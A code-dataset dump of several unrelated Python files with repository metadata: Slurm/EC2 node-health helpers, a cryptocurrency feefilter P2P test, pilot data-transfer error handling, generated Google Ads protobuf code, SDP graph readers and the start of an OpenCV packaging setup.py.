def needs_reset_when_inactive(self):
"""Check if the node need to be reset if node is inactive."""
return self.is_nodeaddr_set() or (not (self.is_power() or self.is_powering_down() or self.is_down()))
class EC2InstanceHealthState:
def __init__(self, id, state, instance_status, system_status, scheduled_events):
"""Initialize slurm node with attributes."""
self.id = id
self.state = state
self.instance_status = instance_status
self.system_status = system_status
self.scheduled_events = scheduled_events
def fail_ec2_health_check(self, current_time, health_check_timeout):
"""Check if instance is failing any EC2 health check for more than health_check_timeout."""
try:
if (
# Check instance status
self.instance_status.get("Status") in EC2_HEALTH_STATUS_UNHEALTHY_STATES
and time_is_up(
self.instance_status.get("Details")[0].get("ImpairedSince"),
current_time,
health_check_timeout,
)
) or (
# Check system status
self.system_status.get("Status") in EC2_HEALTH_STATUS_UNHEALTHY_STATES
and time_is_up(
self.system_status.get("Details")[0].get("ImpairedSince"),
current_time,
health_check_timeout,
)
):
return True
except Exception as e:
logger.warning("Error when parsing instance health status %s, with exception: %s", self, e)
return False
return False
def fail_scheduled_events_check(self):
"""Check if instance has EC2 scheduled maintenance event."""
if self.scheduled_events:
return True
return False
class InvalidNodenameError(ValueError):
r"""
Exception raised when encountering a NodeName that is invalid/incorrectly formatted.
Valid NodeName format: {queue-name}-{st/dy}-{compute-resource}-{number}
And match: ^([a-z0-9\-]+)-(st|dy)-([a-z0-9\-]+)-\d+$
Sample NodeName: queue-1-st-computeresource-2
"""
pass
def parse_nodename(nodename):
"""Parse queue_name, node_type (st vs dy) and instance_type from nodename."""
nodename_capture = re.match(r"^([a-z0-9\-]+)-(st|dy)-([a-z0-9\-]+)-\d+$", nodename)
if not nodename_capture:
raise InvalidNodenameError
queue_name, node_type, compute_resource_name = nodename_capture.groups()
return queue_name, node_type, compute_resource_name
| 41.492843
| 119
| 0.648448
|
8a2c43a2ce7edc4425faae33fb8cc260020487d6
| 3,942
|
py
|
Python
|
test/functional/p2p_feefilter.py
|
patrickdugan/BlockPo-to-Tradelayer
|
ba1ebf3c329751d414302577a09481ba28db1815
|
[
"MIT"
] | null | null | null |
test/functional/p2p_feefilter.py
|
patrickdugan/BlockPo-to-Tradelayer
|
ba1ebf3c329751d414302577a09481ba28db1815
|
[
"MIT"
] | 5
|
2021-06-21T21:21:53.000Z
|
2021-06-22T20:10:16.000Z
|
test/functional/p2p_feefilter.py
|
patrickdugan/BlockPo-to-Tradelayer
|
ba1ebf3c329751d414302577a09481ba28db1815
|
[
"MIT"
] | 1
|
2021-06-21T21:14:45.000Z
|
2021-06-21T21:14:45.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of feefilter messages."""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
def hashToHex(hash):
return format(hash, '064x')
# Wait up to 60 secs to see if the testnode has received all the expected invs
def allInvsMatch(invsExpected, testnode):
for x in range(60):
with mininode_lock:
if (sorted(invsExpected) == sorted(testnode.txinvs)):
return True
time.sleep(1)
return False
class TestNode(P2PInterface):
def __init__(self):
super().__init__()
self.txinvs = []
def on_inv(self, message):
for i in message.inv:
if (i.type == 1):
self.txinvs.append(hashToHex(i.hash))
def clear_invs(self):
with mininode_lock:
self.txinvs = []
class FeeFilterTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
# We lower the various required feerates for this test
# to catch a corner-case where feefilter used to slightly undercut
# mempool and wallet feerate calculation based on GetFee
# rounding down 3 places, leading to stranded transactions.
# See issue #16499
self.extra_args = [["-minrelaytxfee=0.00000100", "-mintxfee=0.00000100"]]*self.num_nodes
def run_test(self):
node1 = self.nodes[1]
node0 = self.nodes[0]
# Get out of IBD
node1.generate(1)
sync_blocks(self.nodes)
# Setup the p2p connections and start up the network thread.
self.nodes[0].add_p2p_connection(TestNode())
network_thread_start()
self.nodes[0].p2p.wait_for_verack()
# Test that invs are received for all txs at feerate of 20 sat/byte
node1.settxfee(Decimal("0.00020000"))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Set a filter of 15 sat/byte
self.nodes[0].p2p.send_and_ping(msg_feefilter(15000))
# Test that txs are still being received (paying 20 sat/byte)
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Change tx fee rate to 10 sat/byte and test they are no longer received
node1.settxfee(Decimal("0.00010000"))
[node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
sync_mempools(self.nodes) # must be sure node 0 has received all txs
# Send one transaction from node0 that should be received, so that we
# we can sync the test on receipt (if node1's txs were relayed, they'd
# be received by the time this node0 tx is received). This is
# unfortunately reliant on the current relay behavior where we batch up
# to 35 entries in an inv, which means that when this next transaction
# is eligible for relay, the prior transactions from node1 are eligible
# as well.
node0.settxfee(Decimal("0.00020000"))
txids = [node0.sendtoaddress(node0.getnewaddress(), 1)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Remove fee filter and check that txs are received again
self.nodes[0].p2p.send_and_ping(msg_feefilter(0))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
if __name__ == '__main__':
FeeFilterTest().main()
| 39.029703
| 96
| 0.662608
|
81f6e2ac54f1810cfd522811e9935cacd8b8c39b
| 8,184
|
py
|
Python
|
pilot/copytool/common.py
|
ptrlv/pilot2
|
c5a83e0eccf7de7bee81705064508198cf09cb49
|
[
"Apache-2.0"
] | null | null | null |
pilot/copytool/common.py
|
ptrlv/pilot2
|
c5a83e0eccf7de7bee81705064508198cf09cb49
|
[
"Apache-2.0"
] | null | null | null |
pilot/copytool/common.py
|
ptrlv/pilot2
|
c5a83e0eccf7de7bee81705064508198cf09cb49
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Tobias Wegner, tobias.wegner@cern.ch, 2017
# - Paul Nilsson, paul.nilsson@cern.ch, 2017
import logging
import os
import re
from pilot.common.errorcodes import ErrorCodes
from pilot.util.filehandling import calculate_checksum, get_checksum_type, get_checksum_value
logger = logging.getLogger(__name__)
def get_timeout(filesize):
"""
Get a proper time-out limit based on the file size.
:param filesize: file size (int).
:return:
"""
timeout_max = 3 * 3600 # 3 hours
timeout_min = 300 # self.timeout
timeout = timeout_min + int(filesize / 0.5e6) # approx < 0.5 Mb/sec
return min(timeout, timeout_max)
def verify_catalog_checksum(fspec, path):
"""
Verify that the local and remote (fspec) checksum values are the same.
The function will update the fspec object.
:param fspec: FileSpec object for a given file.
:param path: path to local file (string).
:return: state (string), diagnostics (string).
"""
diagnostics = ""
state = ""
checksum_type = get_checksum_type(fspec.checksum)
checksum_catalog = get_checksum_value(fspec.checksum)
if checksum_type == 'unknown':
diagnostics = 'unknown checksum type for checksum(catalog): %s' % fspec.checksum
logger.warning(diagnostics)
fspec.status_code = ErrorCodes.UNKNOWNCHECKSUMTYPE
fspec.status = 'failed'
state = 'UNKNOWN_CHECKSUM_TYPE'
else:
checksum_local = calculate_checksum(path, algorithm=checksum_type)
logger.info('checksum (catalog): %s (type: %s)' % (checksum_catalog, checksum_type))
logger.info('checksum (local): %s' % checksum_local)
if checksum_local and checksum_local != '' and checksum_local != checksum_catalog:
diagnostics = 'checksum verification failed: checksum (catalog)=%s != checksum (local)=%s' % \
(checksum_catalog, checksum_local)
logger.warning(diagnostics)
fspec.status_code = ErrorCodes.GETADMISMATCH if checksum_type == 'ad32' else ErrorCodes.GETMD5MISMATCH
fspec.status = 'failed'
state = 'AD_MISMATCH' if checksum_type == 'ad32' else 'MD_MISMATCH'
else:
logger.info('catalog and local checksum values are the same')
return state, diagnostics
def merge_destinations(files):
"""
Converts the file-with-destination dict to a destination-with-files dict
:param files Files to merge
:returns destination-with-files dictionary
"""
destinations = {}
# ensure type(files) == list
for f in files:
# ensure destination in f
if not os.path.exists(f['destination']):
f['status'] = 'failed'
f['errmsg'] = 'Destination directory does not exist: %s' % f['destination']
f['errno'] = 1
else:
# ensure scope, name in f
f['status'] = 'running'
f['errmsg'] = 'File not yet successfully downloaded.'
f['errno'] = 2
lfn = '%s:%s' % (f['scope'], f['name'])
dst = destinations.setdefault(f['destination'], {'lfns': set(), 'files': list()})
dst['lfns'].add(lfn)
dst['files'].append(f)
return destinations
def get_copysetup(copytools, copytool_name):
"""
Return the copysetup for the given copytool.
:param copytools: copytools list from infosys.
:param copytool name: name of copytool (string).
:return: copysetup (string).
"""
copysetup = ""
for ct in copytools.keys():
if copytool_name == ct:
copysetup = copytools[ct].get('setup')
break
return copysetup
def get_error_info(rcode, state, error_msg):
"""
Return an error info dictionary specific to transfer errors.
Helper function to resolve_common_transfer_errors().
:param rcode: return code (int).
:param state: state string used in Rucio traces.
:param error_msg: transfer command stdout (string).
:return: dictionary with format {'rcode': rcode, 'state': state, 'error': error_msg}.
"""
return {'rcode': rcode, 'state': state, 'error': error_msg}
def output_line_scan(ret, output):
"""
Do some reg exp on the transfer command output to search for special errors.
Helper function to resolve_common_transfer_errors().
:param ret: pre-filled error info dictionary with format {'rcode': rcode, 'state': state, 'error': error_msg}
:param output: transfer command stdout (string).
:return: updated error info dictionary.
"""
for line in output.split('\n'):
m = re.search("Details\s*:\s*(?P<error>.*)", line)
if m:
ret['error'] = m.group('error')
elif 'service_unavailable' in line:
ret['error'] = 'service_unavailable'
ret['rcode'] = ErrorCodes.RUCIOSERVICEUNAVAILABLE
return ret
def resolve_common_transfer_errors(output, is_stagein=True):
"""
Resolve any common transfer related errors.
:param output: stdout from transfer command (string).
:param is_stagein: optional (boolean).
:return: dict {'rcode': rcode, 'state': state, 'error': error_msg}.
"""
# default to make sure dictionary exists and all fields are populated (some of which might be overwritten below)
ret = get_error_info(ErrorCodes.STAGEINFAILED if is_stagein else ErrorCodes.STAGEOUTFAILED,
'COPY_ERROR', 'Copy operation failed [is_stagein=%s]: %s' % (is_stagein, output))
if "timeout" in output:
ret = get_error_info(ErrorCodes.STAGEINTIMEOUT if is_stagein else ErrorCodes.STAGEOUTTIMEOUT,
'CP_TIMEOUT', 'copy command timed out: %s' % output)
elif "does not match the checksum" in output and 'adler32' in output:
ret = get_error_info(ErrorCodes.GETADMISMATCH if is_stagein else ErrorCodes.PUTADMISMATCH,
'AD_MISMATCH', output)
elif "does not match the checksum" in output and 'adler32' not in output:
ret = get_error_info(ErrorCodes.GETMD5MISMATCH if is_stagein else ErrorCodes.PUTMD5MISMATCH,
'MD5_MISMATCH', output)
elif "globus_xio:" in output:
ret = get_error_info(ErrorCodes.GETGLOBUSSYSERR if is_stagein else ErrorCodes.PUTGLOBUSSYSERR,
'GLOBUS_FAIL', "Globus system error: %s" % output)
elif "File exists" in output or 'SRM_FILE_BUSY' in output or 'file already exists' in output:
ret = get_error_info(ErrorCodes.FILEEXISTS, 'FILE_EXISTS',
"File already exists in the destination: %s" % output)
elif "No such file or directory" in output and is_stagein:
ret = get_error_info(ErrorCodes.MISSINGINPUTFILE, 'MISSING_INPUT', output)
elif "query chksum is not supported" in output or "Unable to checksum" in output:
ret = get_error_info(ErrorCodes.CHKSUMNOTSUP, 'CHKSUM_NOTSUP', output)
elif "Could not establish context" in output:
error_msg = "Could not establish context: Proxy / VO extension of proxy has probably expired: %s" % output
ret = get_error_info(ErrorCodes.NOPROXY, 'CONTEXT_FAIL', error_msg)
elif "No space left on device" in output:
ret = get_error_info(ErrorCodes.NOLOCALSPACE if is_stagein else ErrorCodes.NOREMOTESPACE,
'NO_SPACE', "No available space left on disk: %s" % output)
elif "No such file or directory" in output:
ret = get_error_info(ErrorCodes.NOSUCHFILE, 'NO_FILE', output)
elif "service is not available at the moment" in output:
ret = get_error_info(ErrorCodes.SERVICENOTAVAILABLE, 'SERVICE_ERROR', output)
elif "Network is unreachable" in output:
ret = get_error_info(ErrorCodes.UNREACHABLENETWORK, 'NETWORK_UNREACHABLE', output)
else:
# reg exp the output
ret = output_line_scan(ret, output)
return ret
| 39.921951
| 116
| 0.659213
|
d3cc0245efb050062a005341fc62d2b5dedd9e9a
| 1,425
|
py
|
Python
|
qucumber/__init__.py
|
silky/QuCumber
|
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-06-27T11:26:29.000Z
|
2019-06-27T11:26:29.000Z
|
qucumber/__init__.py
|
silky/QuCumber
|
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
qucumber/__init__.py
|
silky/QuCumber
|
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2018 PIQuIL - All Rights Reserved
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import warnings
import torch
from .__version__ import __version__
def _warn_on_missing_gpu(gpu):
if gpu and not torch.cuda.is_available():
warnings.warn("Could not find GPU: will continue with CPU.", ResourceWarning)
def set_random_seed(seed, cpu=True, gpu=False, quiet=False):
if gpu and torch.cuda.is_available():
if not quiet:
warnings.warn(
"GPU random seeds are not completely deterministic. "
"Proceed with caution."
)
torch.cuda.manual_seed(seed)
if cpu:
torch.manual_seed(seed)
| 32.386364
| 85
| 0.720702
|
c99b7e55483bf1fc11e83311bd16ff2e8b99d417
| 5,545
|
py
|
Python
|
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/gender_view_service_pb2.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v6/services/gender_view_service.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v6.proto.resources import gender_view_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads/v6/services/gender_view_service.proto',
package='google.ads.googleads.v6.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v6.servicesB\026GenderViewServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V6.Services\312\002 Google\\Ads\\GoogleAds\\V6\\Services\352\002$Google::Ads::GoogleAds::V6::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n:google/ads/googleads/v6/services/gender_view_service.proto\x12 google.ads.googleads.v6.services\x1a\x33google/ads/googleads/v6/resources/gender_view.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\"Z\n\x14GetGenderViewRequest\x12\x42\n\rresource_name\x18\x01 \x01(\tB+\xe0\x41\x02\xfa\x41%\n#googleads.googleapis.com/GenderView2\x9a\x02\n\x11GenderViewService\x12\xbd\x01\n\rGetGenderView\x12\x36.google.ads.googleads.v6.services.GetGenderViewRequest\x1a-.google.ads.googleads.v6.resources.GenderView\"E\x82\xd3\xe4\x93\x02/\x12-/v6/{resource_name=customers/*/genderViews/*}\xda\x41\rresource_name\x1a\x45\xca\x41\x18googleads.googleapis.com\xd2\x41\'https://www.googleapis.com/auth/adwordsB\xfd\x01\n$com.google.ads.googleads.v6.servicesB\x16GenderViewServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V6.Services\xca\x02 Google\\Ads\\GoogleAds\\V6\\Services\xea\x02$Google::Ads::GoogleAds::V6::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,])
_GETGENDERVIEWREQUEST = _descriptor.Descriptor(
name='GetGenderViewRequest',
full_name='google.ads.googleads.v6.services.GetGenderViewRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.services.GetGenderViewRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A%\n#googleads.googleapis.com/GenderView', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=264,
serialized_end=354,
)
DESCRIPTOR.message_types_by_name['GetGenderViewRequest'] = _GETGENDERVIEWREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetGenderViewRequest = _reflection.GeneratedProtocolMessageType('GetGenderViewRequest', (_message.Message,), {
'DESCRIPTOR' : _GETGENDERVIEWREQUEST,
'__module__' : 'google.ads.googleads.v6.services.gender_view_service_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.GetGenderViewRequest)
})
_sym_db.RegisterMessage(GetGenderViewRequest)
DESCRIPTOR._options = None
_GETGENDERVIEWREQUEST.fields_by_name['resource_name']._options = None
_GENDERVIEWSERVICE = _descriptor.ServiceDescriptor(
name='GenderViewService',
full_name='google.ads.googleads.v6.services.GenderViewService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com\322A\'https://www.googleapis.com/auth/adwords',
create_key=_descriptor._internal_create_key,
serialized_start=357,
serialized_end=639,
methods=[
_descriptor.MethodDescriptor(
name='GetGenderView',
full_name='google.ads.googleads.v6.services.GenderViewService.GetGenderView',
index=0,
containing_service=None,
input_type=_GETGENDERVIEWREQUEST,
output_type=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2._GENDERVIEW,
serialized_options=b'\202\323\344\223\002/\022-/v6/{resource_name=customers/*/genderViews/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_GENDERVIEWSERVICE)
DESCRIPTOR.services_by_name['GenderViewService'] = _GENDERVIEWSERVICE
# @@protoc_insertion_point(module_scope)
| 52.809524
| 1,120
| 0.818034
|
7a701e1a94da219fb124addde8b739c7bbbc65b6
| 3,392
|
py
|
Python
|
src/sdp_readers.py
|
gabrielStanovsky/brat-visualizer
|
b741ea894795f56c46238ec5509d8783f6291a73
|
[
"MIT"
] | 3
|
2019-07-16T20:44:39.000Z
|
2022-03-16T16:08:39.000Z
|
src/sdp_readers.py
|
gabrielStanovsky/brat-visualizer
|
b741ea894795f56c46238ec5509d8783f6291a73
|
[
"MIT"
] | null | null | null |
src/sdp_readers.py
|
gabrielStanovsky/brat-visualizer
|
b741ea894795f56c46238ec5509d8783f6291a73
|
[
"MIT"
] | null | null | null |
"""
Common functions for reading sdp format.
"""
# External imports
import logging
import pdb
from pprint import pprint
from pprint import pformat
from docopt import docopt
import networkx as nx
#import matplotlib.pyplot as plt
# Local imports
#----
def safe_zip(*lists):
"""
Zip while making sure all lists are of same
length.
"""
if lists:
assert(all([len(lists[0]) == len(ls)
for ls in lists[1:]]))
return zip(*lists)
def get_words_and_preds(sdp_lines):
"""
Returns the words in the lines, split to columns.
and the predicates (subset of words).
"""
words = [line.strip().split("\t")
for line in sdp_lines
if (not line.startswith('#')) and \
line.strip()]
preds = [word
for word in words
if word[5] == '+']
return (words, preds)
def get_nx_graph(sdp_lines, remove_singletons = False):
"""
Return a networkx graph representation of the conll
input.
@param remove_singletons: Indicates whether to remove nodes which
aren't connected to any other node.
"""
graph = nx.MultiDiGraph()
words, preds = get_words_and_preds(sdp_lines)
total_rels = 0
err_cnt = 0
for line in words:
cur_ind = int(line[0]) - 1
graph.add_node(cur_ind,
label = "{}_{}".format(cur_ind, line[1]),
word = line[1])
rels = line[7:]
active_rels = [(rel_ind, rel)
for rel_ind, rel in enumerate(rels)
if rel != "_"]
total_rels += len(active_rels)
for pred_ref, rel in active_rels:
# populate graph with relations
pred_ind = int(preds[pred_ref][0]) - 1
graph.add_edge(pred_ind,
cur_ind,
label = rel)
if remove_singletons:
nodes_to_remove = []
for node in graph.nodes():
if not (nx.descendants(graph, node) or nx.ancestors(graph, node)):
nodes_to_remove.append(node)
for node in nodes_to_remove:
graph.remove_node(node)
return graph
def draw_graph(graph):
"""
Draw the given graph.
"""
pos = nx.spring_layout(graph)
nx.draw_networkx_nodes(graph,
pos,
node_color = 'w',
linewidths = 0,
node_size = 1500,
node_shape = 's')
nx.draw_networkx_labels(graph,
pos,
labels = nx.get_node_attributes(graph,
'word'))
nx.draw_networkx_edges(graph, pos)
nx.draw_networkx_edge_labels(graph,
pos,
edge_labels = nx.get_edge_attributes(graph,
'label'))
plt.show()
def get_outgoing_edges(graph, node):
"""
Get all outgoing edges from a given node in
a graph.
Includes logic for choosing the ordering of the edges.
"""
return [(node, neighbor, edge_key)
for neighbor, edge_keys
in graph[node].iteritems()
for edge_key in edge_keys]
| 28.745763
| 79
| 0.519458
|
a50746665e4bf18b03f55a396d137aa550a61f39
| 16,344
|
py
|
Python
|
setup.py
|
GArik/opencv-python
|
ad0668838a3446ceddecd3ab7f4bb68435e368d0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
GArik/opencv-python
|
ad0668838a3446ceddecd3ab7f4bb68435e368d0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
GArik/opencv-python
|
ad0668838a3446ceddecd3ab7f4bb68435e368d0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
import io
import os
import os.path
import sys
import runpy
import subprocess
import re
import sysconfig
import platform
import skbuild
from skbuild import cmaker
def main():
os.chdir(os.path.dirname(os.path.abspath(__file__)))
CI_BUILD = os.environ.get("CI_BUILD", "False")
is_CI_build = True if CI_BUILD == "1" else False
cmake_source_dir = "opencv"
minimum_supported_numpy = "1.13.3"
build_contrib = get_build_env_var_by_name("contrib")
build_headless = get_build_env_var_by_name("headless")
build_java = "ON" if get_build_env_var_by_name("java") else "OFF"
if sys.version_info[:2] >= (3, 6):
minimum_supported_numpy = "1.13.3"
if sys.version_info[:2] >= (3, 7):
minimum_supported_numpy = "1.14.5"
if sys.version_info[:2] >= (3, 8):
minimum_supported_numpy = "1.17.3"
if sys.version_info[:2] >= (3, 9):
minimum_supported_numpy = "1.19.3"
# arm64 is a special case
if sys.version_info[:2] >= (3, 6) and platform.machine() == "aarch64":
minimum_supported_numpy = "1.19.3"
numpy_version = "numpy>=%s" % minimum_supported_numpy
python_version = cmaker.CMaker.get_python_version()
python_lib_path = cmaker.CMaker.get_python_library(python_version).replace(
"\\", "/"
)
python_include_dir = cmaker.CMaker.get_python_include_dir(python_version).replace(
"\\", "/"
)
if os.path.exists(".git"):
import pip._internal.vcs.git as git
g = git.Git() # NOTE: pip API's are internal, this has to be refactored
g.run_command(["submodule", "sync"])
g.run_command(
["submodule", "update", "--init", "--recursive", cmake_source_dir]
)
if build_contrib:
g.run_command(
["submodule", "update", "--init", "--recursive", "opencv_contrib"]
)
package_version, build_contrib, build_headless = get_and_set_info(
build_contrib, build_headless, is_CI_build
)
# https://stackoverflow.com/questions/1405913/python-32bit-or-64bit-mode
x64 = sys.maxsize > 2 ** 32
package_name = "opencovis-python"
if build_contrib and not build_headless:
package_name = "opencovis-contrib-python"
if build_contrib and build_headless:
package_name = "opencovis-contrib-python-headless"
if build_headless and not build_contrib:
package_name = "opencovis-python-headless"
long_description = io.open("README.md", encoding="utf-8").read()
packages = ["cv2", "cv2.data"]
package_data = {
"cv2": ["*%s" % sysconfig.get_config_vars().get("SO"), "version.py"]
+ (["*.dll"] if os.name == "nt" else [])
+ ["LICENSE.txt", "LICENSE-3RD-PARTY.txt"],
"cv2.data": ["*.xml"],
}
# Files from CMake output to copy to package.
# Path regexes with forward slashes relative to CMake install dir.
rearrange_cmake_output_data = {
"cv2": (
[r"bin/opencv_videoio_ffmpeg\d{3}%s\.dll" % ("_64" if x64 else "")]
if os.name == "nt"
else []
)
+
# In Windows, in python/X.Y/<arch>/; in Linux, in just python/X.Y/.
# Naming conventions vary so widely between versions and OSes
# had to give up on checking them.
[
"python/cv2[^/]*%(ext)s"
% {"ext": re.escape(sysconfig.get_config_var("EXT_SUFFIX"))}
],
"cv2.data": [ # OPENCV_OTHER_INSTALL_PATH
("etc" if os.name == "nt" else "share/opencv4") + r"/haarcascades/.*\.xml"
],
}
# Files in sourcetree outside package dir that should be copied to package.
# Raw paths relative to sourcetree root.
files_outside_package_dir = {"cv2": ["LICENSE.txt", "LICENSE-3RD-PARTY.txt"]}
ci_cmake_generator = (
["-G", "Visual Studio 14" + (" Win64" if x64 else "")]
if os.name == "nt"
else ["-G", "Unix Makefiles"]
)
cmake_args = (
(ci_cmake_generator if is_CI_build else [])
+ [
# skbuild inserts PYTHON_* vars. That doesn't satisfy opencv build scripts in case of Py3
"-DPYTHON3_EXECUTABLE=%s" % sys.executable,
"-DPYTHON3_INCLUDE_DIR=%s" % python_include_dir,
"-DPYTHON3_LIBRARY=%s" % python_lib_path,
"-DBUILD_opencv_python3=ON",
"-DBUILD_opencv_python2=OFF",
# Disable the Java build by default as it is not needed
"-DBUILD_opencv_java=%s" % build_java,
# When off, adds __init__.py and a few more helper .py's. We use our own helper files with a different structure.
"-DOPENCV_SKIP_PYTHON_LOADER=ON",
# Relative dir to install the built module to in the build tree.
# The default is generated from sysconfig, we'd rather have a constant for simplicity
"-DOPENCV_PYTHON3_INSTALL_PATH=python",
# Otherwise, opencv scripts would want to install `.pyd' right into site-packages,
# and skbuild bails out on seeing that
"-DINSTALL_CREATE_DISTRIB=ON",
# See opencv/CMakeLists.txt for options and defaults
"-DBUILD_opencv_apps=OFF",
"-DBUILD_SHARED_LIBS=OFF",
"-DBUILD_TESTS=OFF",
"-DBUILD_PERF_TESTS=OFF",
"-DBUILD_DOCS=OFF",
]
+ (
["-DOPENCV_EXTRA_MODULES_PATH=" + os.path.abspath("opencv_contrib/modules")]
if build_contrib
else []
)
)
if build_headless:
# it seems that cocoa cannot be disabled so on macOS the package is not truly headless
cmake_args.append("-DWITH_WIN32UI=OFF")
cmake_args.append("-DWITH_QT=OFF")
cmake_args.append("-DWITH_GTK=OFF")
if is_CI_build:
cmake_args.append(
"-DWITH_MSMF=OFF"
) # see: https://github.com/skvark/opencv-python/issues/263
if sys.platform.startswith("linux") and not x64 and "bdist_wheel" in sys.argv:
subprocess.check_call("patch -p0 < patches/patchOpenEXR", shell=True)
# OS-specific components during CI builds
if is_CI_build:
if (
not build_headless
and "bdist_wheel" in sys.argv
and sys.platform.startswith("linux")
):
cmake_args.append("-DWITH_QT=5")
subprocess.check_call("patch -p1 < patches/patchQtPlugins", shell=True)
if sys.platform.startswith("linux"):
rearrange_cmake_output_data["cv2.qt.plugins.platforms"] = [
(r"lib/qt/plugins/platforms/libqxcb\.so")
]
# add fonts for Qt5
fonts = []
for file in os.listdir("/usr/share/fonts/dejavu"):
if file.endswith(".ttf"):
fonts.append(
(r"lib/qt/fonts/dejavu/%s\.ttf" % file.split(".")[0])
)
rearrange_cmake_output_data["cv2.qt.fonts"] = fonts
if sys.platform == "darwin":
rearrange_cmake_output_data["cv2.qt.plugins.platforms"] = [
(r"lib/qt/plugins/platforms/libqcocoa\.dylib")
]
if sys.platform.startswith("linux"):
cmake_args.append("-DWITH_V4L=ON")
cmake_args.append("-DWITH_LAPACK=ON")
cmake_args.append("-DENABLE_PRECOMPILED_HEADERS=OFF")
# https://github.com/scikit-build/scikit-build/issues/479
if "CMAKE_ARGS" in os.environ:
import shlex
cmake_args.extend(shlex.split(os.environ["CMAKE_ARGS"]))
del shlex
# works via side effect
RearrangeCMakeOutput(
